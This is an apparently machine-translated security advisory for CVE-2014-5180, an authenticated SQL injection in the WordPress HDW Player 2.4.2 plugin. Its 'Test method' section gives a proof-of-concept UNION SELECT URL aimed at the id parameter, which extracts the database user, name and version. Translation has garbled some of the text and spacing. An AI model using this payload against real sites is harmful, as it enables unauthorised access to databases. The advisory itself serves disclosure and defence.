WordPress HDW Player Plugin 'wp-admin/admin. php' SQL Injection Vulnerability

WordPress HDW Player Plugin 'wp-admin/admin. php' SQL Injection Vulnerability

Release date:
Updated on:

Affected Systems:
WordPress HDW Player 2.4.2
WordPress HDW Player
Description:
--------------------------------------------------------------------------------
Bugtraq id: 69105
CVE (CAN) ID: CVE-2014-5180
 
The WordPress HDW Player Plug-in can embed the HDW Player into the WordPress website.
 
HDW Player 2.4.2 and other video pages have the SQL injection vulnerability. authenticated remote attackers can use wp-admin/admin. php edits the id parameter in the operation and uses this vulnerability to execute any SQL command.
 
<* Source: Anant Shrivastava
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/wp-admin/admin.php? Page = videos & amp; opt = edit & amp; id = 2 union select

1, 2, user (), 4, 5, 6, database (), 8, @ version, 10, 11, 12

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
WordPress
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Https://wordpress.org/plugins/hdw-player-video-player-video-gallery/

This article permanently updates the link address: